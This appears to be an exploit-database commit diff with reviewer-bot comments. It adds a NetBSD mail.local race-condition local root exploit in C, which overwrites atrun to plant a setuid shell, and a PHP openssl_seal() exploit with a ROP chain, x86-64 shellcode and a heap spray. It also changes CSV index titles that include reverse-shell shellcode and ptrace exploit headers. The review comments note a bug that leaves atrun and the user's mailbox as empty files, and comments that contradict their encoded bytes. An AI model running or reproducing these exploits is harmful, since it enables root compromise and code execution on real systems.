39687,platforms/jsp/webapps/39687.txt,"Novell Service Desk 7.1.0/7.0.3 / 6.5 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",jsp,webapps,0
@ -35979,7 +35979,7 @@ id,file,description,date,author,platform,type,port
39769,platforms/linux/local/39769.txt,"Zabbix Agent 3.0.1 - mysql.size Shell Command Injection",2016-05-04,"Timo Lindfors",linux,local,0
39770,platforms/windows/dos/39770.txt,"McAfee LiveSafe 14.0 - Relocations Processing Memory Corruption",2016-05-04,"Google Security Research",windows,dos,0
39771,platforms/linux/dos/39771.txt,"Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (/etc/shadow)",2016-05-04,"Google Security Research",linux,dos,0
39772,platforms/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit",2016-05-04,"Google Security Research",linux,local,0
39772,platforms/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Local Root Exploit",2016-05-04,"Google Security Research",linux,local,0
39773,platforms/linux/dos/39773.txt,"Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps",2016-05-04,"Google Security Research",linux,dos,0
39774,platforms/windows/dos/39774.html,"Baidu Spark Browser 43.23.1000.476 - Address Bar URL Spoofing",2016-05-05,"liu zhu",windows,dos,0
39775,platforms/windows/dos/39775.py,"RPCScan 2.03 - Hostname/IP Field Crash PoC",2016-05-06,"Irving Aguilar",windows,dos,0
@ -36173,7 +36173,7 @@ id,file,description,date,author,platform,type,port
39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,Metasploit,linux,remote,443
39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
40054,platforms/linux/local/40054.c,"Exim 4 (Debian/Ubuntu) - Spool Local Root Privilege Escalation",2016-07-04,halfdog,linux,local,0
40054,platforms/linux/local/40054.c,"Exim 4 (Debian / Ubuntu) - Spool Local Privilege Escalation",2016-07-04,halfdog,linux,local,0
39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
@ -36269,7 +36269,7 @@ id,file,description,date,author,platform,type,port
40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80
40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Continuously-Probing Reverse Shell via Socket + Port-range + Password shellcode (172 bytes)",2016-07-11,CripSlick,lin_x86-64,shellcode,0
40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 and 11 - Main.swf Hardcoded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0
40107,platforms/windows/local/40107.rb,"Windows 7-10 and 2k8-2k12 x86/x64 - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0
40107,platforms/windows/local/40107.rb,"Windows 7-10 and 2008-2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0
40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution",2016-07-13,Metasploit,linux,remote,443
40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple CSRF Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0
40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0
@ -36277,10 +36277,10 @@ id,file,description,date,author,platform,type,port
40113,platforms/linux/remote/40113.txt,"OpenSSHD <= 7.2p2 - User Enumeration",2016-07-18,"Eddie Harari",linux,remote,22
40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Persistent XSS in AdminCP/ApiLog via xmlrpc API (Post-Auth)",2014-10-12,tintinweb,php,webapps,0
40115,platforms/php/webapps/40115.py,"vBulletin 4.x - SQLi in breadcrumbs via xmlrpc API (Post-Auth)",2014-10-12,tintinweb,php,webapps,0
40118,platforms/windows/local/40118.txt,"Internet Explorer 11 (on Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0
40118,platforms/windows/local/40118.txt,"Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0
40119,platforms/linux/remote/40119.md,"DropBearSSHD <= 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0
40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution and Escalate Privileges",2016-07-17,b0yd,hardware,remote,0
40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell + (Multi-terminal) + Password + Daemon (83_ 148_ 177 bytes)",2016-07-19,CripSlick,lin_x86-64,shellcode,0
40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon (83_ 148_ 177 bytes)",2016-07-19,CripSlick,lin_x86-64,shellcode,0
40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit",2016-07-19,bashis,multiple,remote,0
40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
@ -36297,3 +36297,5 @@ id,file,description,date,author,platform,type,port
40138,platforms/windows/remote/40138.py,"TFTP Server 1.4 - WRQ Buffer Overflow Exploit (Egghunter)",2016-07-21,"Karn Ganeshen",windows,remote,69
40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal (84_ 122_ 172 bytes)",2016-07-21,CripSlick,lin_x86-64,shellcode,0
40140,platforms/php/webapps/40140.txt,"TeamPass Passwords Management System 2.1.26 - Arbitrary File Download",2016-07-21,"Hasan Emre Ozer",php,webapps,80
40141,platforms/bsd/local/40141.c,"mail.local(8) (NetBSD) - Local Root Exploit (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0
40142,platforms/php/remote/40142.php,"Apache 2.4.7 & PHP <= 7.0.2 - openssl_seal() Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0
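Review bot: the new 40141 title leads with the program, "mail.local(8) (NetBSD) - Local Root Exploit (NetBSD-SA2016-006)", whereas every other NetBSD row in this diff leads with platform and version ("NetBSD 5.1 - Multiple 'libc/net' ...", "NetBSD 3.1 FTPd / Tnftpd - ..."), and it gives no affected version range, which the advisory id alone does not convey to anyone filtering the CSV by version. Suggest the platform-first form with the affected releases taken from the advisory, e.g. "NetBSD <= [version from advisory] - mail.local(8) Local Root Exploit (NetBSD-SA2016-006)".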

platforms/bsd/local/40141.c Executable file

@ -0,0 +1,220 @@
// Source: http://akat1.pl/?id=2
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <stdlib.h>
#include <string.h>
#include <err.h>
#include <sys/wait.h>
#define ATRUNPATH "/usr/libexec/atrun"
#define MAILDIR "/var/mail"
static int
overwrite_atrun(void)
{
char *script = "#! /bin/sh\n"
"cp /bin/ksh /tmp/ksh\n"
"chmod +s /tmp/ksh\n";
size_t size;
FILE *fh;
int rv = 0;
fh = fopen(ATRUNPATH, "wb");
if (fh == NULL) {
rv = -1;
goto out;
}
size = strlen(script);
if (size != fwrite(script, 1, strlen(script), fh)) {
rv = -1;
goto out;
}
out:
if (fh != NULL && fclose(fh) != 0)
rv = -1;
return rv;
}
static int
copy_file(const char *from, const char *dest, int create)
{
char buf[1024];
FILE *in = NULL, *out = NULL;
size_t size;
int rv = 0, fd;
in = fopen(from, "rb");
if (create == 0)
out = fopen(dest, "wb");
else {
fd = open(dest, O_WRONLY | O_EXCL | O_CREAT, S_IRUSR |
S_IWUSR);
if (fd == -1) {
rv = -1;
goto out;
}
out = fdopen(fd, "wb");
}
if (in == NULL || out == NULL) {
rv = -1;
goto out;
}
while ((size = fread(&buf, 1, sizeof(buf), in)) > 0) {
if (fwrite(&buf, 1, size, in) != 0) {
rv = -1;
goto out;
}
}
out:
if (in != NULL && fclose(in) != 0)
rv = -1;
if (out != NULL && fclose(out) != 0)
rv = -1;
return rv;
}
int
main()
{
pid_t pid;
uid_t uid;
struct stat sb;
char *login, *mailbox, *mailbox_backup = NULL, *atrun_backup, *buf;
umask(0077);
login = getlogin();
if (login == NULL)
err(EXIT_FAILURE, "who are you?");
uid = getuid();
asprintf(&mailbox, MAILDIR "/%s", login);
if (mailbox == NULL)
err(EXIT_FAILURE, NULL);
if (access(mailbox, F_OK) != -1) {
/* backup mailbox */
asprintf(&mailbox_backup, "/tmp/%s", login);
if (mailbox_backup == NULL)
err(EXIT_FAILURE, NULL);
}
if (mailbox_backup != NULL) {
fprintf(stderr, "[+] backup mailbox %s to %s\n", mailbox,
mailbox_backup);
if (copy_file(mailbox, mailbox_backup, 1))
err(EXIT_FAILURE, "[-] failed");
}
/* backup atrun(1) */
atrun_backup = strdup("/tmp/atrun");
if (atrun_backup == NULL)
err(EXIT_FAILURE, NULL);
fprintf(stderr, "[+] backup atrun(1) %s to %s\n", ATRUNPATH,
atrun_backup);
if (copy_file(ATRUNPATH, atrun_backup, 1))
err(EXIT_FAILURE, "[-] failed");
/* win the race */
fprintf(stderr, "[+] try to steal %s file\n", ATRUNPATH);
switch (pid = fork()) {
case -1:
err(EXIT_FAILURE, NULL);
/* NOTREACHED */
case 0:
asprintf(&buf, "echo x | /usr/libexec/mail.local -f xxx %s "
"2> /dev/null", login);
for(;;)
system(buf);
/* NOTREACHED */
default:
umask(0022);
for(;;) {
int fd;
unlink(mailbox);
symlink(ATRUNPATH, mailbox);
sync();
unlink(mailbox);
fd = open(mailbox, O_CREAT, S_IRUSR | S_IWUSR);
close(fd);
sync();
if (lstat(ATRUNPATH, &sb) == 0) {
if (sb.st_uid == uid) {
kill(pid, 9);
fprintf(stderr, "[+] won race!\n");
break;
}
}
}
break;
}
(void)waitpid(pid, NULL, 0);
if (mailbox_backup != NULL) {
/* restore mailbox */
fprintf(stderr, "[+] restore mailbox %s to %s\n",
mailbox_backup, mailbox);
if (copy_file(mailbox_backup, mailbox, 0))
err(EXIT_FAILURE, "[-] failed");
if (unlink(mailbox_backup) != 0)
err(EXIT_FAILURE, "[-] failed");
}
/* overwrite atrun */
fprintf(stderr, "[+] overwriting atrun(1)\n");
if (chmod(ATRUNPATH, 0755) != 0)
err(EXIT_FAILURE, NULL);
if (overwrite_atrun())
err(EXIT_FAILURE, NULL);
fprintf(stderr, "[+] waiting for atrun(1) execution...\n");
for(;;sleep(1)) {
if (access("/tmp/ksh", F_OK) != -1)
break;
}
/* restore atrun */
fprintf(stderr, "[+] restore atrun(1) %s to %s\n", atrun_backup,
ATRUNPATH);
if (copy_file(atrun_backup, ATRUNPATH, 0))
err(EXIT_FAILURE, "[-] failed");
if (unlink(atrun_backup) != 0)
err(EXIT_FAILURE, "[-] failed");
if (chmod(ATRUNPATH, 0555) != 0)
err(EXIT_FAILURE, NULL);
fprintf(stderr, "[+] done! Don't forget to change atrun(1) "
"ownership.\n");
fprintf(stderr, "Enjoy your shell:\n");
execl("/tmp/ksh", "ksh", NULL);
return 0;
}
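Review bot: copy_file never produces a usable backup: in the loop after `while ((size = fread(&buf, 1, sizeof(buf), in)) > 0)` the write goes to `in` (the read-only input stream) rather than `out`, and the check `!= 0` would flag a successful write as an error, so `/tmp/atrun` and the mailbox copy end up empty and the "restore" steps at the end overwrite /usr/libexec/atrun and the user's mailbox with empty files instead of restoring them. Anyone running this in a lab should expect atrun to be left as an empty 0555 file owned by the unprivileged user (the code itself says "Don't forget to change atrun(1) ownership") plus a setuid /tmp/ksh, which are also the artifacts a defender would look for. The header only cites the source URL; it should name the advisory the CSV row references (NetBSD-SA2016-006) and the affected NetBSD versions.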


@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/7112/info
A vulnerability has been discovered in the Linux kernel which can be exploited using the ptrace() system call. By attaching to an incorrectly configured root process, during a specific time window, it may be possible for an attacker to gain superuser privileges.
@ -5,6 +6,7 @@ A vulnerability has been discovered in the Linux kernel which can be exploited u
The problem occurs due to the kernel failing to restrict trace permissions on specific root spawned processes.
This vulnerability affects both the 2.2 and 2.4 Linux kernel trees.
*/
/* lame, oversophisticated local root exploit for kmod/ptrace bug in linux
* 2.2 and 2.4


@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/7112/info
A vulnerability has been discovered in the Linux kernel which can be exploited using the ptrace() system call. By attaching to an incorrectly configured root process, during a specific time window, it may be possible for an attacker to gain superuser privileges.
@ -5,7 +6,7 @@ A vulnerability has been discovered in the Linux kernel which can be exploited u
The problem occurs due to the kernel failing to restrict trace permissions on specific root spawned processes.
This vulnerability affects both the 2.2 and 2.4 Linux kernel trees.
*/
/*
* Author: snooq [http://www.angelfire.com/linux/snooq/]
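Review bot: the description block here (source URL, "A vulnerability has been discovered in the Linux kernel which can be exploited using the ptrace() system call..." through the "2.2 and 2.4 Linux kernel trees" line) is identical to the sibling file's header, and the only file-specific text is the author line; add a one-line note on how this variant differs from the other entry for the same BID so the two are not mistaken for duplicates.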

platforms/php/remote/40142.php (205 lines, executable file)

@ -0,0 +1,205 @@
<?php
// Source: http://akat1.pl/?id=1
function get_maps() {
$fh = fopen("/proc/self/maps", "r");
$maps = fread($fh, 331337);
fclose($fh);
return explode("\n", $maps);
}
function find_map($sym) {
$addr = 0;
foreach(get_maps() as $record)
if (strstr($record, $sym) && strstr($record, "r-xp")) {
$addr = hexdec(explode('-', $record)[0]);
break;
}
if ($addr == 0)
die("[-] can't find $sym base, you need an information leak :[");
return $addr;
}
function fill_buffer($offset, $content) {
global $buffer;
for ($i = 0; $i < strlen($content); $i++)
$buffer[$offset + $i] = $content[$i];
return;
}
$pre = get_maps();
$buffer = str_repeat("\x00", 0xff0000);
$post = get_maps();
$tmp = array_diff($post, $pre);
if (count($tmp) != 1)
die('[-] you need an information leak :[');
$buffer_base = hexdec(explode('-',array_values($tmp)[0])[0]);
$addr = $buffer_base+0x14; /* align to string */
echo "[+] buffer string @ 0x".dechex($addr)."\n";
$align = 0xff;
$addr += $align;
echo "[+] faking EVP_PKEY @ 0x".dechex($addr)."\n";
echo "[+] faking ASN @ 0x".dechex($addr)."\n";
fill_buffer($align + 12, pack('P', $addr));
$libphp_base = find_map("libphp7");
echo "[+] libphp7 base @ 0x".dechex($libphp_base)."\n";
/* pop x ; pop rsp ; ret - stack pivot */
$rop_addr = $libphp_base + 0x00000000004a79c3;
echo "[+] faking pkey_free @ 0x".dechex($addr+0xa0-4)." = ".dechex($rop_addr)."\n";
fill_buffer($align + 0xa0 - 4, pack('P', $rop_addr));
/* pop rbp ; pop rbp ; ret - clean up the stack after pivoting */
$rop_addr = $libphp_base + 0x000000000041d583;
fill_buffer($align - 4, pack('P', $rop_addr));
$libc_base = find_map("libc-");
echo "[+] libc base @ 0x".dechex($libc_base)."\n";
$mprotect_offset = 0xf4a20;
$mprotect_addr = $libc_base + $mprotect_offset;
echo "[+] mprotect @ 0x".dechex($mprotect_addr)."\n";
$mmap_offset = 0xf49c0;
$mmap_addr = $libc_base + $mmap_offset;
echo "[+] mmap @ 0x".dechex($mmap_addr)."\n";
$apache2_base = find_map("/usr/sbin/apache2");
echo "[+] apache2 base @ 0x".dechex($apache2_base)."\n";
$ap_rprintf_offset = 0x429c0;
$ap_rprintf_addr = $apache2_base + $ap_rprintf_offset;
echo "[+] ap_rprintf @ 0x".dechex($ap_rprintf_addr)."\n";
$ap_hook_quick_handler_offset = 0x56c00;
$ap_hook_quick_handler_addr = $apache2_base + $ap_hook_quick_handler_offset;
echo "[+] ap_hook_quick_handler @ 0x".dechex($ap_hook_quick_handler_addr)."\n";
echo "[+] building ropchain\n";
$rop_chain =
pack('P', $libphp_base + 0x00000000000ea107) . // pop rdx ; ret
pack('P', 0x0000000000000007) . // rdx = 7
pack('P', $libphp_base + 0x00000000000e69bd) . // pop rsi ; ret
pack('P', 0x0000000000004000) . // rsi = 0x1000
pack('P', $libphp_base + 0x00000000000e5fd8) . // pop rdi ; ret
pack('P', $addr ^ ($addr & 0xffff)) . // rdi = page aligned addr
pack('P', $mprotect_addr) . // mprotect addr
pack('P', ($addr ^ ($addr & 0xffff)) | 0x10ff); // return to shellcode_stage1
fill_buffer($align + 0x14, $rop_chain);
$shellcode_stage1 = str_repeat("\x90", 512) .
"\x48\xb8" . pack('P', $buffer_base + 0x2018) . // movabs shellcode_stage2, %rax
"\x49\xb8" . pack('P', 0x1000) . // handler size
"\x48\xb9" . pack('P', $buffer_base + 0x3018) . // handler
"\x48\xba" . pack('P', $ap_hook_quick_handler_addr) . // movabs ap_hook_quick_handler, %rdx
"\x48\xbe" . pack('P', 0) . // UNUSED
"\x48\xbf" . pack('P', $mmap_addr) . // movabs mmap,%rdi
"\xff\xd0" . // callq %rax
"\xb8\x27\x00\x00\x00" . // mov $0x27,%eax - getpid syscall
"\x0f\x05" . // syscall
"\xbe\x1b\x00\x00\x00" . // mov $0xd,%esi - SIGPROF
"\x89\xc7" . // mov %eax,%edi - pid
"\xb8\x3e\x00\x00\x00" . // mov $0x3e,%eax - kill syscall
"\x0f\x05"; // syscall
fill_buffer(0x1000, $shellcode_stage1);
$shellcode_stage2 = str_repeat("\x90", 512) .
"\x55" . // push %rbp
"\x48\x89\xe5" . // mov %rsp,%rbp
"\x48\x83\xec\x40" . // sub $0x40,%rsp
"\x48\x89\x7d\xe8" . // mov %rdi,-0x18(%rbp)
"\x48\x89\x75\xe0" . // mov %rsi,-0x20(%rbp)
"\x48\x89\x55\xd8" . // mov %rdx,-0x28(%rbp)
"\x48\x89\x4d\xd0" . // mov %rcx,-0x30(%rbp)
"\x4c\x89\x45\xc8" . // mov %r8,-0x38(%rbp)
"\x48\x8b\x45\xe8" . // mov -0x18(%rbp),%rax
"\x41\xb9\x00\x00\x00\x00" . // mov $0x0,%r9d
"\x41\xb8\xff\xff\xff\xff" . // mov $0xffffffff,%r8d
"\xb9\x22\x00\x00\x00" . // mov $0x22,%ecx
"\xba\x07\x00\x00\x00" . // mov $0x7,%edx
"\xbe\x00\x20\x00\x00" . // mov $0x2000,%esi
"\xbf\x00\x00\x00\x00" . // mov $0x0,%edi
"\xff\xd0" . // callq *%rax
"\x48\x89\x45\xf0" . // mov %rax,-0x10(%rbp)
"\x48\x8b\x45\xf0" . // mov -0x10(%rbp),%rax
"\x48\x89\x45\xf8" . // mov %rax,-0x8(%rbp)
"\xeb\x1d" . // jmp 0x40063d <shellcode+0x6d>
"\x48\x8b\x45\xf8" . // mov -0x8(%rbp),%rax
"\x48\x8d\x50\x01" . // lea 0x1(%rax),%rdx
"\x48\x89\x55\xf8" . // mov %rdx,-0x8(%rbp)
"\x48\x8b\x55\xd0" . // mov -0x30(%rbp),%rdx
"\x48\x8d\x4a\x01" . // lea 0x1(%rdx),%rcx
"\x48\x89\x4d\xd0" . // mov %rcx,-0x30(%rbp)
"\x0f\xb6\x12" . // movzbl (%rdx),%edx
"\x88\x10" . // mov %dl,(%rax)
"\x48\x8b\x45\xc8" . // mov -0x38(%rbp),%rax
"\x48\x8d\x50\xff" . // lea -0x1(%rax),%rdx
"\x48\x89\x55\xc8" . // mov %rdx,-0x38(%rbp)
"\x48\x85\xc0" . // test %rax,%rax
"\x75\xd2" . // jne 0x400620 <shellcode+0x50>
"\x48\x8b\x7d\xf0" . // mov -0x10(%rbp),%rdi
"\x48\x8b\x45\xd8" . // mov -0x28(%rbp),%rax
"\xb9\xf6\xff\xff\xff" . // mov $0xfffffff6,%ecx
"\xba\x00\x00\x00\x00" . // mov $0x0,%edx
"\xbe\x00\x00\x00\x00" . // mov $0x0,%esi
"\xff\xd0" . // callq *%rax
"\xc9" . // leaveq
"\xc3"; // retq
fill_buffer(0x2000, $shellcode_stage2);
$handler =
"\x55" . // push %rbp
"\x48\x89\xe5" . // mov %rsp,%rbp
"\x48\x83\xec\x30" . // sub $0x30,%rsp
"\x48\x89\x7d\xd8" . // mov %rdi,-0x28(%rbp)
"\x48\xb8" . pack('P', $ap_rprintf_addr) . // movabs $0xdeadbabefeedcafe,%rax
"\x48\x89\x45\xf8" . // mov %rax,-0x8(%rbp)
"\x48\xb8" . "Hello Wo" . // movabs CONTENT,%rax
"\x48\x89\x45\xe0" . // mov %rax,-0x20(%rbp)
"\x48\xb8" . "rld!\n\x00\x00\x00" . // movabs CONTENT,%rax
"\x48\x89\x45\xe8" . // mov %rax,-0x20(%rbp)
"\x48\x8d\x4d\xe0" . // lea -0x20(%rbp),%rcx
"\x48\x8b\x55\xd8" . // mov -0x28(%rbp),%rdx
"\x48\x8b\x45\xf8" . // mov -0x8(%rbp),%rax
"\x48\x89\xce" . // mov %rcx,%rsi
"\x48\x89\xd7" . // mov %rdx,%rdi
"\xff\xd0" . // callq *%rax
"\xb8\x00\x00\x00\x00" . // mov $0x0,%eax
"\xc9" . // leaveq
"\xc3"; // retq
fill_buffer(0x3000, $handler);
$addr = pack('P', $addr);
$memory = str_repeat($addr,321);
$pem = "
-----BEGIN PUBLIC KEY-----
MCwwDQYJKoZIhvcNAQEBBQADGwAwGAIRANG2dvm8oNiH3IciNd44VZcCAwEAAQ==
-----END PUBLIC KEY-----"; /* Random RSA key */
$a = array_fill(0,321,0);
/* place valid keys at the beginning */
$k = openssl_pkey_get_public($pem);
$a[0] = $k; $a[1] = $k; $a[2] = $k;
echo "[+] spraying heap\n";
$x = array();
for ($i = 0 ; $i < 20000 ; $i++) {
$x[$i] = str_repeat($memory, 1);
}
for ($i = 0 ; $i < 20000 ; $i++) {
unset($x[$i]);
}
unset($x);
echo "[+] triggering openssl_seal()...\n";
@openssl_seal($_, $_, $_, $a);
echo "[-] failed ;[\n";
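Review bot: several inline comments contradict the values they annotate, which makes the chain hard to audit: `pack('P', 0x0000000000004000) . // rsi = 0x1000` packs 0x4000, `"\xbe\x1b\x00\x00\x00" . // mov $0xd,%esi - SIGPROF` encodes 0x1b (27, which is SIGPROF), `"\x48\xb8" . pack('P', $ap_rprintf_addr) . // movabs $0xdeadbabefeedcafe,%rax` keeps a placeholder constant in the comment, and the second `mov %rax,-0x20(%rbp)` in $handler is encoded with displacement 0xe8, i.e. -0x18(%rbp). Update the comments to match the encoded bytes. The libc, apache2 and libphp7 offsets ($mprotect_offset, $mmap_offset, $ap_rprintf_offset, $ap_hook_quick_handler_offset and the gadget offsets) are hard-coded with no record of the package builds they were taken from; state them in the header comment next to the source URL so readers know which builds the PoC was tested against. Minor: get_maps() does not check the fopen() result before fread().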